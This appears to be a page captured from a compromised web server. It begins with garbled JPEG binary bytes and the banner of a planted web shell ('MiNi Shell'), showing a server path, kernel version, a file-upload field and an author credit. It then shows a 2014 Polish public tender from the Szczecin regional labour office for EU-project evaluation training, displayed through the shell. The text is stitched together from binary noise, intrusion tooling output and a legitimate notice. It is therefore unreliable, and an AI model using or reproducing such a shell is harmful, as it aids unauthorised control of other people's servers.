JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140822/180283-N-2014.html

<p class="kh_header"><b>Szczecin: Usługa zorganizowania szkolenia pn. Ewaluacja projektów
unijnych w celu przygotowania się do przedsięwzięć w nowej
perspektywie finansowej 2014-2020- drugie postępowanie</b><br>
<b>Numer ogłoszenia: 180283 - 2014; data zamieszczenia: 22.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Szczecinie , ul. Mickiewicza 41, 70-383 Szczecin, woj. zachodniopomorskie, tel. 091 4256100, faks 091 4256103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wup.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania szkolenia pn. Ewaluacja projektów
unijnych w celu przygotowania się do przedsięwzięć w nowej
perspektywie finansowej 2014-2020- drugie postępowanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szacunkowa wartość zamówienia: 6
829,27 zł netto. Szczegółowy opis przedmiotu zamówienia: Przedmiotem zamówienia jest usługa zorganizowania i
zrealizowania szkolenia (przez szkolenie Zamawiający rozumie kurs, wymieniony w § 3 ust. 5 Rozporządzenia
Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach
pozaszkolnych, (Dz. U. nr 0 poz. 186 z dnia 17 lutego 2012 r.) pn.: Ewaluacja projektów unijnych w celu
przygotowania się do przedsięwzięć w nowej perspektywie finansowej 2014-2020 wraz z zapewnieniem sali
szkoleniowej oraz poczęstunkiem dla łącznie 14 pracowników Wojewódzkiego Urzędu Pracy w Szczecinie.
Założenia organizacyjne Liczba uczestników: 14 pracowników WUP Termin: 29-30 września 2014 r. Czas trwania
szkolenia dla jednej grupy: 2 dni - 2 x 8 godzin kształcenia (1 godzina kształcenia = 45 minut).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda następujących dokumentów: Oświadczenia o spełnianiu warunków udziału w
postępowaniu, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda następujących dokumentów: wykazu wykonanych, a w przypadku świadczeń
okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech
lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a
jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, przeprowadził co najmniej dwie usługi
dwudniowego szkolenia wraz zapewnieniem sali szkoleniowej oraz poczęstunku dla grupy nie mniejszej
niż 14 osób o wartości nie mniejszej niż 7 000 zł brutto każda, wraz z podaniem ich wartości,
przedmiotu, dat wykonania i podmiotów, na rzecz których, dostawy lub usługi zostały wykonane, oraz
załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. W celu potwierdzenia
spełniania niniejszego warunku, Wykonawca zobowiązany jest przedłożyć wykaz usług sporządzony wg
propozycji stanowiącej Formularz nr 5 do SIWZ. Dowodami, o których mowa w punkcie 6.1.2. SIWZ
należy rozumieć dowody zgodnie z § 1 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego
2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w
jakich te dokumenty mogą być składane (Dz. U. z 19.02.2013 r., poz. 231)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda następujących dokumentów: Oświadczenia o spełnianiu warunków udziału w
postępowaniu, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda następujących dokumentów: wykazu osób, które będą uczestniczyć w wykonywaniu
zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie
robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie
czynności, oraz informacją o podstawie do dysponowania tymi osobami: Na potwierdzenie, iż
Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, poprzez wskazanie dwóch osób (trenerów): I) W
pierwszym dniu szkolenia, to jest 29.09.2014 r., Wykonawca zapewni do prowadzenia szkolenia trenera
który: a) posiada wykształcenie wyższe; b) posiada min. trzy lata doświadczenia w prowadzeniu
szkoleń; c) przeprowadził w okresie od 1 stycznia 2012 roku do dnia złożenia oferty, czterech
grupowych szkoleń zamkniętych - każde trwające po minimum 7 godzin kształcenia, każde dla minimum
12 osób, na temat ewaluacji projektów realizowanych w ramach Programu Operacyjnego Kapitał
Ludzki, poświęconych w całości temu tematowi. II) W drugim dniu szkolenia, to jest 30.09.2014 r.,
Wykonawca zapewni do prowadzenia szkolenia trenera który: a) posiada wykształcenie wyższe; b)
posiada min. trzy lata doświadczenia w prowadzeniu szkoleń; c) przeprowadził w okresie od 1 stycznia
2011 roku do dnia złożenia oferty, pięciu grupowych szkoleń zamkniętych - każde trwające po minimum
14 godzin kształcenia, każde dla minimum 12 osób, na temat pisania, realizacji, wdrażania i rozliczania
projektów finansowanych ze środków Programu Operacyjnego Kapitał Ludzki, poświęconych w całości
temu tematowi. d) przeprowadził w okresie od 1 stycznia 2014 roku do dnia złożenia oferty, trzech
grupowych szkoleń zamkniętych - każde trwające po minimum 7 godzin kształcenia, każde dla minimum
12 osób, na temat nowej perspektywy finansowej 2014-2020 - nowego systemu i zasad realizacji
projektów, poświęconych w całości temu tematowi. Zamawiający nie uzna na poczet spełnienia w/w
warunku: - przeprowadzenia zajęć dydaktycznych ze wskazanego zakresu na studiach licencjackich,
magisterskich, podyplomowych, - przeprowadzenia szkoleń wewnętrznych dla podległych pracowników.
Tym samym zamawiający uzna na poczet spełnienia w/w warunku tylko szkolenia (kurs, seminarium). W
celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób
sporządzony wg propozycji stanowiącej Formularz nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda następujących dokumentów: Oświadczenia o spełnianiu warunków udziału w
postępowaniu, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz nr 1- Oferta cenowa. - Formularz nr 6- Liczba dodatkowych, grupowych szkoleń zamkniętych na temat
ewaluacji projektów realizowanych w ramach Programu Operacyjnego Kapitał Ludzki. - Formularz nr 7- Liczba
dodatkowych, grupowych szkoleń zamkniętych na temat nowej perspektywy finansowej 2014-2020 - nowego
systemu i zasad realizacji projektów. - Formularz nr 8- Opis zaoferowanego obiektu. - Załącznik nr 1 do SIWZProgram
nauczania wraz z harmonogramem wg wzoru - Pełnomocnictwa osób podpisujących ofertę do
podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych
dokumentów. Tylko w sytuacjach określonych w Części II w Rozdziale I pkt 1.5 lub w przypadku składania oferty
wspólnej. - Zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów- jeśli
dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Liczba dodatkowych grupowych szkoleń zamkniętych na temat ewaluacji projektów realizowanych w ramach Programu Operacyjnego Kapitał Ludzki - 30</li>
<li>3 - Liczba dodatkowych grupowych szkoleń zamkniętych na temat nowej perspektywy finansowej 2014-2020 - nowego systemu i zasad realizacji projektów - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na
podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności
wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: I. Zmiana będąca
następstwem okoliczności leżących po stronie Zamawiającego: I.1. Zmiana terminu realizacji przedmiotu umowy
spowodowana: a) przedłużającymi się czynnościami prowadzącymi do wyboru najkorzystniejszej oferty w
przedmiotowym postępowaniu. b) trudności ze skompletowaniem określonej liczby uczestników, c) wystąpienie
okoliczności utrudniających terminowa realizację przedmiotu zamówienia (np. zmiana osoby, zmiana
zaoferowanego obiektu). II. Zmiany będące następstwem okoliczności leżących po stronie Wykonawcy: II.1.
Zmiana osoby prowadzącej szkolenie. a) spowodowana czynnikami niezależnymi od Wykonawcy. II.2. Zmiana
zaoferowanego obiektu o którym mowa w Formularzu nr 8 do SIWZ. a) spowodowana czynnikami niezależnymi
od Wykonawcy. W przypadku wystąpienia okoliczności wymienionej w pkt 13. 9.: - ppkt I.1., termin wykonania
umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w
sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności, - ppkt II.1, gdy min. jedna osoba
wskazana w ofercie nie będzie mogła zrealizować szkolenia. Wykonawca będzie musiał przedłożyć stosowne
zaświadczenie oraz propozycję innej osoby, która spełniać będzie takie same wymagania w zakresie warunków
udziału w postępowaniu jak i otrzyma taką samą lub większą ilość punktów przez pierwotnego wykładowcę
(trenera), według przyjętych kryteriów. Wraz z propozycją Wykonawca będzie musiał złożyć wszelkie niezbędne
dokumenty wskazane w SIWZ, - ppkt II.2. gdy realizacja usługi nie będzie mogła zostać zrealizowana,
Wykonawca będzie musiał przedłożyć stosowne zaświadczenie nie później niż 5 dni przed planowanym terminem
realizacji usługi oraz propozycję innego obiektu, która spełniać będzie takie same wymagania. Wraz z propozycją
Wykonawca będzie musiał złożyć wszelkie niezbędne dokumenty wskazane w SIWZ. Wszystkie powyższe
postanowienia, o których mowa w pkt 13.9 SIWZ, stanowią katalog zmian na które, Zamawiający może wyrazić
zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art.
26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1,
wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca
samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.pl/pl/urzad/zamowienia/zamowienia-publiczne/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w
Szczecinie ul. A. Mickiewicza 41, 70-383 Szczecin, w pok. 039.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 12:00, miejsce: Wojewódzki Urząd Pracy w
Szczecinie ul. A. Mickiewicza 41, 70-383 Szczecin, w pok. 036.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com